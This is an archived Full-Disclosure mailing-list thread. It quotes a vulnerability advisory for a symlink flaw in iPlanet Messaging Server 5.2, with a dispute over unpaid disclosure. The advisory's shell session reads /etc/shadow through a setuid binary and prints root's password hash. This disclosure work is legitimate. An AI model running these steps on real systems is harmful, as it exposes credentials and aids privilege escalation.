[<prev] [next>] [day] [month] [year] [list]
Message-ID: <002d01c6924c$06f5f530$010aa8c0@DORKA>
Date: Sat Jun 17 21:26:13 2006
From: very at unprivate.com (php0t)
Subject: [Fwd: Re: Sun iPlanet Messaging Server 5.2 root
password compromise]
Excuse me, but what have I done to you?
And why am I only supposed to disclose bugs when somebody pays me for it
?
Can you please explain your rant, so next time I can do -whatever-
different?
And by the way, I'm not 'trying to prove I can find holes', I didn't
spend any time trying to
find a hole in this specific software, I just happened to stumble upon
it in the process
of trying to gain root - after which I decided to disclose this silly
and obvious bug.
So I ask again, is this a problem for you? Am I being ignorant / evil
for posting this vuln?
Just tell me what's up - If your problem is that I do not get paid for
this - well - I am happy
that you are so much after what's best for me but I can do fine on my
own - thanks.
php0t / zorro.hu
> You are wasting your time trying to prove you can find holes in
software that you AREN'T *PAID FOR* FINDING BUGS.
> Nice advisory, though. you spend time on it.
> Sincerely,
> T.Solo
php0t wrote:
> Summary
> ----------------
> Date: 14 Jun 2006
> Vendor: Sun Microsystems, Inc.
> Name: iPlanet Messaging Server
> Version: 5.2 HotFix 1.16 (built May 14 2003)
> Vuln: msg.conf symlink attack
> Severity: high
>
>
> Software description
> ----------------
> The iPlanet Messaging Server is a software product that provides a
> centralized location for the exchange of information through the
> sending and receiving of messages. The product is designed for
> telecommunications providers, service providers, and enterprises that
> offer messaging capabilities to employees, partners, and customers.
> The iPlanet Messaging Server delivers a Web-based messaging platform
> capable of serving tens of millions of users, and also provides
> value-added differentiated services, including outsourcing, wireless
> ,and unified messaging services.
>
>
> Vulnerability desciption
> ----------------
> Setuid programs part of the iPlanet Messaging Server try to read the
> configuration file msg.conf. If the environment variable CONFIGROOT is
> set, the configuration is read from that directory.
> A symlink attack is possible, and as a result it is possible to read
the
> first line of any file with uid=0.
>
>
> Example
> ----------------
> test@...box:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version
> iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
> libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003) SunOS sunbox
> 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris
> test@...box:/tmp$
> test@...box:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> -rws--s--x 1 root mail 446864 Sep 22 2005
> /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> test@...box:/tmp$
> test@...box:/tmp$ ln -s /etc/shadow msg.conf
> test@...box:/tmp$
> test@...box:/tmp$ export CONFIGROOT=.
> test@...box:/tmp$
> test@...box:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> [14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error:
> func=_configdrv_file_readoption; error=option name should be followed
by
> '='; line=root:qW1HFEa1MCD0w:11821::::::
> ERROR: Configuration database initialization failed - see default
> logfile
> test@...box:/tmp$
>
>
> Vulnerable
> ----------------
> iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
>
> php0t / zorro.hu
> www.zorro.hu
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Powered by blists - more mailing lists